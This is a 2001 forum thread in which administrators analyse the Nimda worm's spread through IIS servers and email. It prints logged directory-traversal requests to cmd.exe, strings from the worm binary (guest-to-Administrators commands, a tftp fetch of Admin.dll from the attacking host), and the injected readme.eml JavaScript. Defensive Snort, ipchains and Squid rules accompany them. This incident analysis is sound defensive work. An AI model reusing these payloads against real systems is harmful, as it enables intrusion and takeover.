New (More) Annoying Microsoft Worm Hits Net

A new worm seems to be running rampant Unlike Code Red, it attempts to hit boxes with many different exploits (including what looks like an attempt to exploit boxes still rooted by Code Red). It looks like each IP tries 16 attempts on its neighbors. There is also a new mail worm mailing WAV files or something with bits of what appears to be the registry... it may or may not be related. Got any words on this? Shut down those windows boxes and stop opening attachments. And make that 21. Got another one while writing this story. All my hits are coming from 208.n.n.n (where I am) I'm sure it'll keep moving to nearby boxes. Update: 09/18 16:40 GMT by J : It now has a name: "Nimda." More info here, here, and here.

Here are examples of the requests it's sending:

GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../ ..%c1%1c../winnt/system32/cmd.exe?/c+dir
GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir

While writing this story I was hit a total of 4 times, 16 GET attempts per attack. In only 4 minutes. Also of interest, My desktop has now been hit about 500 times today, all from 208.x.x.x IPs. This might be really bad. I still haven't read anything about this anywhere else, so you heard it here first ;)

Update Web servers compromised by this worm apparently attach a "readme.eml" to all web pages served... and due to a bug in IE5, it will automatically execute the file! Yay Internet Explorer!

Bleah...my firewall logs all of this...

[Dimensio]

And it suddenly had to back up once a week after Code Red started thwacking my machine. Perhaps I should write a script to exploit the root-hack and shut down the affected machines so that the local cable circuit won't be clogged with that crap. I can't imagine how bad this will get.

It's not like @Home (in my area) is doing *anything* to stop this. I really think that they should be policing for such disruptive activities and informing their customers when unsecured machines on their network are comprimised.

408 worm too?

[libertynews]

I'm seeing massive numbers of timed out requests on my sytems this morning. It started at exactly 9:06 eastern time.

I checked one of the IPs and it said 'Fuck USA Government, Fuck PoisonBOx' and opened a second window with what looked like a MIME buffer overflow attempt. I run Opera on Linux so it didn't effect me. It looks like we may be getting hit in a shotgun approach. My systems are in the 207.227 range and 208.

Brian

Wrong name

[platinum]

The 208.x.x.x is similiar to Code Red in that it attempts to scan local subnets (I bet you are have a 208.x.x.x IP); therefore, naming it 208 is only good for those in your Class A. We have received attempts from over 100 hosts infected with the Code Red 2 worm, starting from the local class C, then class B, and now class A and others. It appears to be attempting to find rooter servers, for what purpose I can only imagine.

here's more output

[TheGratefulNet]

www.iitelecom.qc.ca - - [18/Sep/2001:08:10:05 -0700] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 281

www.iitelecom.qc.ca - - [18/Sep/2001:08:10:05 -0700] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291

www.iitelecom.qc.ca - - [18/Sep/2001:08:10:06 -0700] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305

www.iitelecom.qc.ca - - [18/Sep/2001:08:10:06 -0700] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/syst em32/cmd.exe?/c+dir HTTP/1.0" 404 322

www.iitelecom.qc.ca - - [18/Sep/2001:08:10:07 -0700] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/syst em32/cmd.exe?/c+dir HTTP/1.0" 404 322

www.iitelecom.qc.ca - - [18/Sep/2001:08:10:07 -0700] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c 1%1c../..%c1%1c../winnt/system32/cmd.

It looks like Code Blue from here

[flyhmstr]

Security focus [securityfocus.com] has some information on it, we're seeing shedloads of hits at the moment :(

Outlook Express 6.0 can prevent spread

[savaget]

With the new Outlook Express 6.0, you can now prevent the user from opening any attchments.

Here is how it is done:

Tools>Options>Security>check "Do not allow attchments to be saved or opened that could potentially be a virus"

Been hit many many times already

[strags]

Wow - I've got about 1000 similar hits in my logs, starting from around 6.30am this morning. From a variety of different IP addresses.

63.73.31.242 just hit me 16 times.

Going to http://63.73.31.242 indicates:
"National Aerospace Documentation Home Page"
and attempts to launch a "readme.exe" executable immediately.

Just checked another site: 63.168.150.72 - plain old IIS page, but attempts to launch the same executable.

So, we have Code Red, with an added attempt to launch a (no doubt) malicious executable from infected pages.

Too Slow

[xanadu-xtroot.com]

Damn. I just got an e-mail from my ISP (corporate LAN/WAN) telling us of this. Here's their text:

~~~~~~~~~~~~~
Many ISPs, including [ISP], are under attack by a new worm that appears to be related to the recent CodeRed worm. This worm attacks Microsoft web servers via a known vulnerability and seeks to replicate itself by searching for other vulnerable servers.
The traffic caused by this worm has caused severe network problems worlwide this morning (18 Sep 2001) according to many ISP-related mailing lists. More information will be sent to this announcement list as it becomes available.
~~~~~~~~~~~~~

OK, so they say it's a Code-Redish bug. According to Taco's post, it's not even close (sort of).

I'm using *NIX/Apache.
I'm not gonna worry about this one (yet again...). Y'all with them damn Win boxes keeping the Internet flooded with this sort of junk, PLEASE either shut of your machines, or get a real OS...
(or at least, apply the damn patch already)

Yep, we're seeing them here too.

[Olinator]

David Korpiewski, our Windoze martyr, is hard at work on this one (I Don't Do Windows:-), and had this to say:

Evidence from compromised boxes elsewhere on campus seems to indicate that this bug will create a ton of *.eml files on the computer and they are all about 78k. Wehaven't received an .eml file in hand yet, to view the contents. A variety of .eml files are created, including "desktop.eml", "readme.eml", etc.

A compromised system will attach a readme.eml file to the bottom of all web pages served. This is because there is currently a bug [guninski.com] out for IE5 that will auto execute any given .eml file.

Damn...just submitted this story...

[ergo98]

Anyways here's the sequence of attempts it makes, trying to capitalize on old worms that weren't cleaned up properly, as well as known unicode exploits.

2001-09-18 15:10:19 *.*.*.* GET /scripts/root.exe 404 701 72 0 - -

2001-09-18 15:10:19 *.*.*.* GET /MSADC/root.exe 404 701 70 0 - -

2001-09-18 15:10:19 *.*.*.* GET /c/winnt/system32/cmd.exe 404 701 80 0 - -

2001-09-18 15:10:19 *.*.*.* GET /d/winnt/system32/cmd.exe 404 701 80 0 - -

2001-09-18 15:10:19 *.*.*.* GET /scripts/..%5c../winnt/system32/cmd.exe 404 701 96 10 - -

2001-09-18 15:10:19 *.*.*.* GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/c md.exe 404 701 117 10 - -

2001-09-18 15:10:20 *.*.*.* GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/c md.exe 404 701 117 0 - -

2001-09-18 15:10:20 *.*.*.* GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../ winnt/system32/cmd.exe 404 701 145 0 - -

2001-09-18 15:10:20 *.*.*.* GET /scripts/..Á../winnt/system32/cmd.exe 404 701 97 0 - -

2001-09-18 15:10:20 *.*.*.* GET /scripts/winnt/system32/cmd.exe 404 701 97 10 - -

2001-09-18 15:10:20 *.*.*.* GET /scripts/../../winnt/system32/cmd.exe 404 701 97 0 - -

2001-09-18 15:10:20 *.*.*.* GET /scripts/..\../winnt/system32/cmd.exe 404 701 97 0 - -

2001-09-18 15:10:21 *.*.*.* GET /scripts/..%5c../winnt/system32/cmd.exe 404 701 98 0 - -

2001-09-18 15:10:21 *.*.*.* GET /scripts/..%5c../winnt/system32/cmd.exe 404 701 96 0 - -

2001-09-18 15:10:21 *.*.*.* GET /scripts/..%5c../winnt/system32/cmd.exe 404 701 100 0 - -

2001-09-18 15:10:21 *.*.*.* GET /scripts/..%2f../winnt/system32/cmd.exe 404 701 96 0 - -

Furthermore every attacking system was in the same 255.0.0.0/8 as the target system so it appears to target in the same "Class A" address (of course in this case it's 216.x.x.x so it's not really Class A, but you get the point).

More Info

[Nater]

When the dir command succeeds (or rather, when the worm believes it has succeeded), the next request has a tftp command embedded in it which attempts to install a file called Admin.dll. Following that, there is a request for the dll itself, which presumably kick starts the worm.

I'll take a look at Admin.dll later today.

Re:Wrong name

[platinum]

<replying to myself>
If you try to access a vulnerable server it attempts to send you a 'readme.eml' file with a .wav content type. This file (using strings) appears to contain numerous registry entries plus all the strings used to find and infect other servers.

We've been seeing it too

[Chang]

Snort has been picking this up as IDS297 (directory traversal) and 102:1:1 (ISS Unicode attack) at our location since about 9:00am EDT.

We are seeing very heavy activity (not as bad as Code Red) since then.

Worm Un-named no longer

[GodHead]

From NTBugTraq

w32.nimda.amm

New Virus

[Sternn]

I contacted UUNET (My T1 provider) and they told me it was a strain of Code Red. It seems to be everywhere. I have isolated a few dozen IP's from my logs already. I have contacted the web admins of the sites in question as well. I am getting about 100+ hits a minute now, utilizing about 10%-20% of the T1 the main webserver is on. I'm guessing this will be a problem for everyone, even if your not running IIS, or your server is patched (like mine), the hundreds of scans can eat your bandwidth away regardless.

-S

Apache commands

[man_ls]

apache_1adminconfig
fontsmrtns2
apacheroutedelete
hpfontsmod_perl-1
gettime
big-sister-0
apachejmeter_1
pdfwritr
apache-contrib1lo66293
routedelete
autoexec
apachejmeter_1mod_phantomimap

No ideas...got me what it's doing.

I've been getting these, as well as SirCam messages, the "Hi! How are you? I send you this file to ask for you advice..." with ATT0000059.TXT, a 59-byte file, and ATT0000059.DAT, 159KB that looks like it contains some type of executable code.

I've also gotten the snippits of the registry:
"ware\Microsoft\Windo,b4 pull123"

Anyone have any ideas about this? I haven't opened anything except the messages, and Windows 2000 is pretty secure, but I'd rather not get infected with something if possible.

Re:here's more output

[cphipps]

...including what looks like an attempt to exploit boxes still rooted by Code Red

Assuming that refers to this:

"GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0"

then that's an exploit for Code Red II [f-secure.com] infected machines, not the original Code Red.

Snort rule

[AftanGustur]

Add this to your in-house SnortRules file.

alert TCP $EXTERNAL_NET any -> $HOME_NET 80 (msg:"AfterRed Worm"; flags: A+; content: "/cmd.exe"; nocase;)

They're very _active_ aren't they...

[FreeMars]

Those machines must have a lot of probe threads running -- I got hit by a site at 8:47 and again at 10:25. (Or else the random number generator in the worm is bad.)

My DSL to home is completely swamped ... I can't even get a ping through.

Default.asp changed by virus

[hex1848]

I just samspaded one of the IP's thats been hitting our site. it places a bit of javascript code at the bottom of the page that basically forces IE to download readme.exe. DO NOT TRY TO GO TO AN INFECTED IP ADDRESS.

Infected IIS delivered payload via HTTP

[Anonymous Coward]

Infected IIS servers also have another, more interesting delivery method... When you hit a web site on an infected server, it also delivers a "readme.eml" file, with an "readme.exe" payload file.

Browsers like Opera (and, I assume, Netscape) view this as a plain-text document, but MSIE takes that EML file and treats it like an Outlook email... which means it uses the Outlook security settings, -and the recently discovered Outlook version 6 security hole-, I believe.

If that "readme.exe" file does what I think it does... You can figure it out from there. I suggest somebody grab the README.EML file and dissect the fucker.

-- Christian Wagner ( cwagner at io.com )

Appeded JavaScript

[_Bunny]

I've telneted to several of the hosts that have probed us in the last hour.

It appears that this new worm is appending the following JavaScript snippet to all pages that the server sends:

<html><script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000 ")</script></html>

Not sure what this JavaScript is suppose to do, but it's there none the less.

- Matt

TruSecure ALERT- TSA 01-023 - W32.nimda.a.mm

[CiaranC]

TruSecure ALERT- TSA 01-023 - W32.nimda.a.mm

Date: September 18, 2001
Time: 1000 EDT

RISK INDICES:

Initial Assessment: RED HOT

Threat: VERY HIGH, (rapidly increasing)

Vulnerability Prevalence: VERY HIGH, effects IIS servers version 4.0,
5.0, and internal networks.

Cost: High, command execution is possible

Vulnerable Systems: IIS 4.0 and 5.0

SUMMARY:
A new IIS worm is spreading rapidly. Its working name is Nimda:
W32.nimda.a.mm

It started about 9am eastern time today, Tuesday,September 18, 2001,
Mulitple sensors world-wide run by TruSecure corporation are getting
multiple hundred hits per hour. And began at 9:08am am.

The worm seems to be targeting IIS 4 and 5 boxes and tests boxes for
multiple vulnerabilities including:

Almost all are get scripts, and a get msadc (cmd.exe)
get_mem_bin
vti_bin owssvr.dll
Root.exe
CMD.EXE
../ (Unicode)
Getadmin.dll
Default.IDA
/Msoffice/ cltreq.asp

This is not code red or a code red variant.

The worm, like code red attempts to infect its local sub net first,
then spreads beyond the local address space.

It is spreading very rapidly.

TruSecure believes that this worm will infect any IIS 4 and IIS 5
box with well known vulnerabilities. We believe that there are
nearly 1Million such machines currently exposed to the Internet.

Risks Indices:
Vulnerability VULNERABILITY PREVALANCE is very high - Milllions of
Internet Web server hosts: TruSecure process and essential
configurations should generally be protective. The vulnerability
prevalence world-wide is very high

Threat - VERY HIGH and Growing The rate of growth and spread is
exceedingly rapid - significantly faster than any worm to date and
significantly faster than any variant of Code red.

Cost -- Unknown, probably moderate per infected system.

The worm itself is a file called
README.EXE, or ADMIN.DLL
a 56K file which is advertised as an audio xwave mime type file.

Other RISKS:
There is risk of DOS of network segments by traffic volume alone
There is large risk of successful attack to both Internet exposed IIS
boxes and to developer and Intranet boxes inside of corporations.

Judging by the Code Red II experience, we expect many subtle routes
of infection leading to inside corporate infections.

We cannot discount the coincidence of the date and time of release,
exactly one week to (probably to the minute) as the World Trade
Center attack .

REPLICATION:
There are at least three mechanisms of spread:
The worm seems to spread both by a direct IIS across Internet (IP
spread)
It probably also spreads by local shares. (this is not known for
sure at this time)
There is also an email vector where README.EXE is sent via email to
numerous accounts.

Mitigations
TruSecure essential practices should work.
Block all email with EXE attachments
Filter for README.EXE
Make sure IIS boxes are well patched and hardened, or removed from
both the Internet and Intranets.
Make sure any developer computing platforms are not running IIS of
any version (many do so by default if either.
Disconnect mail from the Internet
Advise users not to double click on any unexpected attachments.
Update anti-virus when your vendor has the signature.

how do I get rid of it?

[wiredog]

Step 1. Get BSD or Linux
Step 2. Install.
Problem fixed.

Some interesting strings from README.EXE

[undie]

Here are some interesting strings found in the readme.exe this worm sends down (some stuff snipped):

Concept Virus(CV) V.5, Copyright(C)2001 R.P.China

SYSTEM\CurrentControlSet\Services\lanmanserver\S ha res\Security
share c$=c:\
user guest ""
localgroup Administrators guest /add
localgroup Guests guest /add
user guest /active
open
user guest /add
HideFileExt

/scripts
/MSADC
/scripts/..%255c..
/_vti_bin/..%255c../..%255c../..%255c..
/_mem_bin/..%255c../..%255c../..%255c..
/msadc/..%255c../..%255c../..%255c/..%c1%1c../.. %c 1%1c../..%c1%1c..
/scripts/..%c1%1c..
/scripts/..%c0%2f..
/scripts/..%c0%af..
/scripts/..%c1%9c..
/scripts/..%%35%63..
/scripts/..%%35c..
/scripts/..%25%35%63..
/scripts/..%252f..
/root.exe?/c+
/winnt/system32/cmd.exe?/c+
net%%20use%%20\\%s\ipc$%%20""%%20/user:"guest"
tftp%%20-i%%20%s%%20GET%%20Admin.dll%%20
Admin.dll
c:\Admin.dll
d:\Admin.dll
e:\Admin.dll
window.open("readme.eml", null, "resizable=no,top=6000,left=6000")
/Admin.dll

qusery9bnow
-qusery9bnow
\mmc.exe
\riched20.dll
boot
Shell
explorer.exe load.exe -dontrunold
\system.ini
\load.exe

if you don't mind a few ipchains rules...

[DirkGently]

...try this. its a pretty quick hack, and you'll need to modify the path to your apache logs in the grep line. but its what I just whipped up. hope its useful. I just ran it and it works for me.

#!/bin/sh

for LUSER in `grep "winnt" /var/log/httpd/error_log | awk '{print $8}' | sed -e s/]//`; do
if [ ! "`ipchains -L -n | grep $LUSER`" ]
then ipchains -A input -s $LUSER -d 0/0 -j DENY
fi
done

TruSecure notice

[Anonymous Coward]

TruSecure ALERT- TSA 01-023 - W32.nimda.a.mm

Date: September 18, 2001
Time: 1000 EDT

RISK INDICES:

Initial Assessment: RED HOT

Threat: VERY HIGH, (rapidly increasing)

Vulnerability Prevalence: VERY HIGH, effects IIS servers version 4.0,
5.0, and internal networks.

Cost: High, command execution is possible

Vulnerable Systems: IIS 4.0 and 5.0

SUMMARY:
A new IIS worm is spreading rapidly. Its working name is Nimda:
W32.nimda.a.mm

It started about 9am eastern time today, Tuesday,September 18, 2001,
Mulitple sensors world-wide run by TruSecure corporation are getting
multiple hundred hits per hour. And began at 9:08am am.

The worm seems to be targeting IIS 4 and 5 boxes and tests boxes for
multiple vulnerabilities including:

Almost all are get scripts, and a get msadc (cmd.exe)
get_mem_bin
vti_bin owssvr.dll
Root.exe
CMD.EXE
../ (Unicode)
Getadmin.dll
Default.IDA
/Msoffice/ cltreq.asp

This is not code red or a code red variant.

The worm, like code red attempts to infect its local sub net first,
then spreads beyond the local address space.

It is spreading very rapidly.

TruSecure believes that this worm will infect any IIS 4 and IIS 5
box with well known vulnerabilities. We believe that there are
nearly 1Million such machines currently exposed to the Internet.

Risks Indices:
Vulnerability VULNERABILITY PREVALANCE is very high - Milllions of
Internet Web server hosts: TruSecure process and essential
configurations should generally be protective. The vulnerability
prevalence world-wide is very high

Threat - VERY HIGH and Growing The rate of growth and spread is
exceedingly rapid - significantly faster than any worm to date and
significantly faster than any variant of Code red.

Cost -- Unknown, probably moderate per infected system.

The worm itself is a file called
README.EXE, or ADMIN.DLL
a 56K file which is advertised as an audio xwave mime type file.

Other RISKS:
There is risk of DOS of network segments by traffic volume alone
There is large risk of successful attack to both Internet exposed IIS
boxes and to developer and Intranet boxes inside of corporations.

Judging by the Code Red II experience, we expect many subtle routes
of infection leading to inside corporate infections.

We cannot discount the coincidence of the date and time of release,
exactly one week to (probably to the minute) as the World Trade
Center attack .

REPLICATION:
There are at least three mechanisms of spread:
The worm seems to spread both by a direct IIS across Internet (IP
spread)
It probably also spreads by local shares. (this is not known for
sure at this time)
There is also an email vector where README.EXE is sent via email to
numerous accounts.

Mitigations
TruSecure essential practices should work.
Block all email with EXE attachments
Filter for README.EXE
Make sure IIS boxes are well patched and hardened, or removed from
both the Internet and Intranets.
Make sure any developer computing platforms are not running IIS of
any version (many do so by default if either.
Disconnect mail from the Internet
Advise users not to double click on any unexpected attachments.
Update anti-virus when your vendor has the signature.

Re:TruSecure ALERT- TSA 01-023 - W32.nimda.a.mm

[CiaranC]

http://securityresponse.symantec.com/avcenter/venc /data/w32.nimda.a@mm.html

Extract:-

W32.Nimda.A@mm

Discovered on: September 18, 2001

Last Updated on: September 18, 2001 at 08:15:23 AM PDT

This is the preliminary information known at this time.

There is a new mass-mailing worm that utilizes email to propagate itself. The threat arrives as readme.exe in an email.

In addition, the worm sends out probes to IIS servers attempting to spread by using the Unicode Web Traversal exploit similar to W32.BlueCode.Worm. Compromised servers may display a webpage prompting a visitor to download an Outlook file which contains the worm as an attachment.

Also, the worm will create an open network share allowing access to the system. The worm will also attempt to spread via open network shares.

Once again..

[Dimensio]

Did a file search on my computer and found 'admin.dll' in two places. One was in c:\windows\system32\dllcache and the other was in C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\isapi\_vti_adm

I do have IIS installed because I have done some web development (it's for my company, I'd rather they use Apache or somesuch, but...) I've also seen the 'alerts' and they state that the wormed 'admin.dll' is a 56k file -- mine is only 20k. What worries me is that if I delete it from either location it reappears within seconds from apparently nowhere. Anyone else have info regarding the filesize or the persistance of admin.dll?

I don't have any .eml files or readme.exe, and I have patched against the Code Red exploits.

unmap your EML file association

[Anonymous Coward]

install the Windows Resource Kit.

read...

C:\Program Files\Resource Kit>associate

Registers or Unregisters a file extension operating system shell.

ASSOCIATE .ext filename [/q /d /f]

.ext Extension to be associated.
filename Execuatble program to associate .ext with.
/q Quiet - Suppresses all interactive prompts.
/d Delete - Deletes the association if it exists.
/f Force - Forces overwrite or delete without questions.

Examples:
Associate .Lst NotePad.Exe
Adds the association of .Lst with Notepad.Exe.

Associate .Lst /d
Deletes the association of .Lst from Notepad.Exe.

Associate .Lst
Returns the association for .Lst if it exists.

Return Value:
A return value of zero indicates success.

C:\Program Files\Resource Kit>associate .eml /d
Remove association ".eml,"%ProgramFiles%\Outlook Express\msimn.exe"" (y/n) ? Y
Association ".eml,"%ProgramFiles%\Outlook Express\msimn.exe"" removed

C:\Program Files\Resource Kit>

Re:Is this just the old Unicode exploit?

[Dedalous]

It's something new attacking something old. It looks to me like its trying a few of the old IIS vulnerabilities: directory transversal, and code red II/sadmind backdoors. Some people are saying its affecting fully patched machines, but I don't think that's true. My IIS 5 machines are getting hammered, but not one has been infected (although, if the backdoors were still around, you could still use the root.exe.exploit on a fully patched machine, I think).

MS really need to try to get a better tool out there for detecting and installing patches. Lots of people just don't know the right way to install multiple patches. My suggestion:

1. Run hfnetchk to see what you're missing.
2. Expand each hotfix to a directory with -x option.
3. Install each hotfix (in order) with hotfix.exe -q -m -n -z
4. Run qtrain.exe.
5. Reboot.
6. Run qfecheck to make sure they're all valid.
7. Watch the compromise attempts bounce off you're fully patched server.
8. Repeat next week when someone finds the next gaping security hole in IIS.

Re:Does it affect IE 6?

[WildBeast]

IE6 tried opening it with Windows Media Player and then it said that the format wasn't recognized. So my guess is that it's not vulnerable.

This is the EML file headers...

[TDScott]

...and it's actually quite clever if you look closely...

MIME-Version: 1.0
Content-Type: multipart/related;
type="multipart/alternative";
boundary="====_ABC1234567890DEF_===="
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1

--====_ABC1234567890DEF_====
Content-Type: multipart/alternative;
boundary="====_ABC0987654321DEF_===="

--====_ABC0987654321DEF_====
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

--====_ABC0987654321DEF_====--

--====_ABC1234567890DEF_====
Content-Type: audio/x-wav;
name="readme.exe"
Content-Transfer-Encoding: base64
Content-ID:

Re:unmap your EML file association

[Lxy]

Easier method:
Create a text file and name it something like eml.reg. Right click, select Edit. Paste the following lines into the file:

REGEDIT4

[HKEY_CLASSES_ROOT\.eml]
@="Microsoft Internet Mail Message"
"Content Type"="text/plain"

And save the file. Double click and it will add itself to the registry. This will re-associate the .eml extension with Notepad. NOTE: this may affect Outlook since the .eml is an extension used for mail stores. Use at your own risk.

Re:JetDirect print servers affected??

[Peter H.S.]

Twice this morning I've had to power cycle an HP JetDirect, something I've NEVER had to do before... is this related, or just coincidence?
An awfull amount of equipment with embedded webservers, was affected by Code Red*, including (some/all?) HP JetDirect printservers, but also all kind of managed switches, and routers.
Usually because a small memory leak would occur for every GET, enough GETs in a row, and the system will lockup, until powercycled.
Of course, other problems may lay behind the lockups of your equipment. But since the HP JetDirect in question, probably is on the LAN side, you may have infected machines behind your firewall.

We got it and it used RealPlayer to lock us out...

[NanoGator]

We were victims of this virus as well. Only this time what happened was it used RealPlayer to keep respawning itself, causing explorer to crash repeatedly and eventually fill up virtual memory until it crashed.

This made it problematic to figure out what to do to stop this because I couldn't even do something as simple as look at my system drive. Fortunately, I was able to use Taskmanager.

If anybody runs into a problem like this, here are a some tips:

- Explorer is basically hosed using this type of attack. However, Taskmanager (set to always on top) will allow you to perform basic file operations. From Taskmanager, go to 'File/Run' and hit "Browse". When you rightclick on a file/folder you can do things like delete, rename, etc.

- In this particular case, RealPlayer was being used to cyclicly run itself over and over again, so I renamed the 'Real' folder to 'Real_', thus making Windows think the program's non-existent anymore. This was tricky because the file was sometimes in use, but I was finally able to manage it.

- I found the 'readme.eml' file on the system drive. I'm still trying to determine how it got there, but it can be prevented from entering there by creating a 'readme.eml' folder, as my coworker recommended. This will prevent a file with that name from being created in there.

- If you have trouble deleting the files that were being run, check to make sure that they're not 'System Files'. I ran into that problem.

Fix graphic

[Hoonis]

This shows how to manually disable the hole in ie/outlook:

http://www.rainfinity.com/scripting_fix.jpg [rainfinity.com]

the new macafee datfiles also successfuly fix it (we tested, their first one didn't work!)

Re:unmap your EML file association

[Spy Hunter]

You should use regedit to look at and save the current value of this key first so you can restore your system when Microsoft releases the patch. Otherwise you could have some trouble re-associating it because the current value is an umpteen-digit GUID. If you lose that value you might not be able to find it again.

Start->Run, type in "regedit." Open the HKEY_CLASSES_ROOT folder, find .eml, then right-click its value and select "Modify." Copy and paste this value into a file somewhere where you'll be able to find it again. Then change the association like above.

Comeon NT/2000 users, lets get with it

[Whyzzi]

Microsoft's published a handy-dandy GUI tool that will eliminate most of these types of worms. Go here

http://www.microsoft.com/Downloads/Release.asp?Rel easeID=32362

Re:Spread analysis

[Anonymous Coward]

Missing a few, so try this:

FILE="./error_log" && (((grep winnt $FILE) && (grep root.exe $FILE)) | cut -d " " -f 8 | cut -d ] -f 1 | sort | uniq | wc -l)

There are currently 4 known means of propogation

[jedinite]

The best site to track this incident IMO (incidents.org) now has a pretty good picture of what's going on from a technical perspective.

A short summary:

The Nimda worm is now known to propogate four ways:

(1) An IIS vulnerability propagation mechanism where the worm attempts to exploit a large number of IIS vulnerabilities to gain control of a victim IIS server. Once in control, the worm uses tftp to fetch its code in a file called Admin.dll from the attacking server.

(2) Email propogation. The worm harvests email addresses from the address book and potentially the web browser history and sends itself to all addresses as an attachment called readme.exe. These executables are automatically executed if the receipient who opens (or previews) the email is running Internet Explorer 5 or 6. Note that the worm may spoof the source address on the emails.

(3) When a web server is infected, the worm replaces all web pages on the server with a binary encoded as a wav file, which can infect each client that connects to the server. The wav file is called readme.eml. Microsoft Internet Explorer 5.0 and higher will automatically execute the malicious file.

(4) The worm is network aware and propagates via open shares. It will propagate to shares that are accessible to username guest with no password.

See: www.incidents.org/react/nimda.php [incidents.org] for the full details.

- YASP (Yet Another Security Professional) who is fighting this pretty heavily at work - nothing here infected, of course, but the traffic itself is threatening to become a pretty nice distributed DOS - our Internet Router (a decently-hefty CSCO 6500-series) is sitting at ~60% processor utilization.

Re:Damn it!

[Anonymous Coward]

They don't use it by default but here's a couple of pointers:

http://xi.nu/~jheiss/sendmail/tlsandrelay.shtml

http://www.sendmail.org/~ca/email/starttls.html

Re:yup!

[weave]

We got nailed. Apparently if you apply hotfixes, patches, SPs in the wrong order, it undoes previous fixes...

Wrong way:
Service Pack 6A
IIS cumulative rollup patch
Post SP6A security rollup patch

Right way:
Service Pack 6a
Post-SP6a Security Roll-up
IIS Cumulative Patch

We thought we were covered. Nope. :-(

(reference, focus-ms mailing list)

Squid acl to block .eml files.

[funky womble]

If you have windows boxen proxied through a squid (or, behind a unix router where you could install a squid as a transparent proxy) then you can do this:

acl umbricus_microsoftius url_regex \.eml$
http_access deny umbricus_microsoftius

Obviously it quite an easy filter to come up with, but I may as well post it for anyone that didn't think of it. Bit easier than reconfiguring 4 gazillion IE boxen and fielding all the calls about websites needing VBS/Javascript not working after you've fixed people's machines.

Concept (CV) Virus - Namba worm ?

[mglcel]

sorry for the last ugry post, bad manipulation.

I've received a mail, with an attached file readme.exe declared as mime format audio/x-wav.

after hexadecimal dump, i've noticed this string :

000090c0 6e 74 65 72 66 61 63 65 73 00 00 00 43 6f 6e 63 |nterfaces...Conc|
000090d0 65 70 74 20 56 69 72 75 73 28 43 56 29 20 56 2e |ept Virus(CV) V.|
000090e0 35 2c 20 43 6f 70 79 72 69 67 68 74 28 43 29 32 |5, Copyright(C)2|
000090f0 30 30 31 20 20 52 2e 50 2e 43 68 69 6e 61 00 00 |001 R.P.China..|

"Concept Virus(CV) V.5, Copyright(C)2001 R.P.China"

in the code i can found :

00009b20 2f 5f 76 74 69 5f 62 69 6e 2f 2e 2e 25 32 35 35 |/_vti_bin/..%255| 00009b30 63 2e 2e 2f 2e 2e 25 32 35 35 63 2e 2e 2f 2e 2e |c../..%255c../..|
00009b40 25 32 35 35 63 2e 2e 00 2f 5f 6d 65 6d 5f 62 69 |%255c.../_mem_bi| 00009b50 6e 2f 2e 2e 25 32 35 35 63 2e 2e 2f 2e 2e 25 32 |n/..%255c../..%2|

_vti_bin and _mem_bin are part of my apache access logs :
213.195.72.2 - - [18/Sep/2001:23:57:27 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/syst em32/cmd.exe?/c+dir HTTP/1.0" 404 249 213.195.72.2 - - [18/Sep/2001:23:57:27 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/syst em32/cmd.exe?/c+dir HTTP/1.0" 404 249 major part of the mail can be found in the hex dump as :
000092a0 0d 0a 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e |....|
000092b0 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 20 62 67 43 |.| 00092d0 0a 3c 69 66 72 61 6d 65 20 73 72 63 3d 33 44 63 |.....--| which is the code of the html part of the mail,

or :
00009350 37 38 39 30 44 45 46 5f 3d 3d 3d 3d 0d 0a 43 6f |7890DEF_====..Co|
00009360 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 75 64 69 |ntent-Type: audi| 00009370 6f 2f 78 2d 77 61 76 3b 0d 0a 09 6e 61 6d 65 3d |o/x-wav;...name=| 00009380 22 72 65 61 64 6d 65 2e 65 78 65 22 0d 0a 43 6f |"readme.exe"..Co| 00009390 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 |ntent-Transfer-E| 000093a0 6e 63 6f 64 69 6e 67 3a 20 62 61 73 65 36 34 0d |ncoding: base64.| 000093b0 0a 43 6f 6e 74 65 6e 74 2d 49 44 3a 20 3c 45 41 |.Content-ID: .......| which corresponds to the mail :
I 3 readme.exe [audio/x-wav, base64, 75K] (mutt output) I'm not a virus expert, but if somebody is interested by the readme.exe code or more informations, please mail mglcel@gcu-squad.org. I've sent a mail to mc-afee support to learn if they know this worm, Concept(CV).

URLScan

[Pinball Wizard]

I just found a very interesting tool at Microsoft's website, UrlScan [microsoft.com]. It is able to identify malformed requests, and thus is able to prevent against future, unknown worms. It discards the requests before they can be executed.

Anyone know if something like this exists for Apache? A tool like this, if widespread, could effectively contain future buffer-overrun type attacks.

Re:There are currently 4 known means of propogatio

[mlefevre]

Nowhere on the link [incidents.org] you provided does it specify which versions of IE are affected. Indeed, I'm fairly certain that IE6 is *not* affected (or at least requires the user to respond to a dialog box before it will run .eml or .exe files). Moreover, I'm fairly sure that MS has patches for these vulnerabilities in IE5.

You are correct about IE6 being unaffected. The vulnerability is not present in IE 5.01 SP2 or IE 5.5 SP2. If you've got a lesser version, you should install the service pack, although alternatively there is a patch [microsoft.com], which has been available since March when the problem was found.

Technical write up on nimda

[winter@ES]

A great technical write up on nimda can be found right here [datafellows.com].

Man.. it's nasty too...

paulb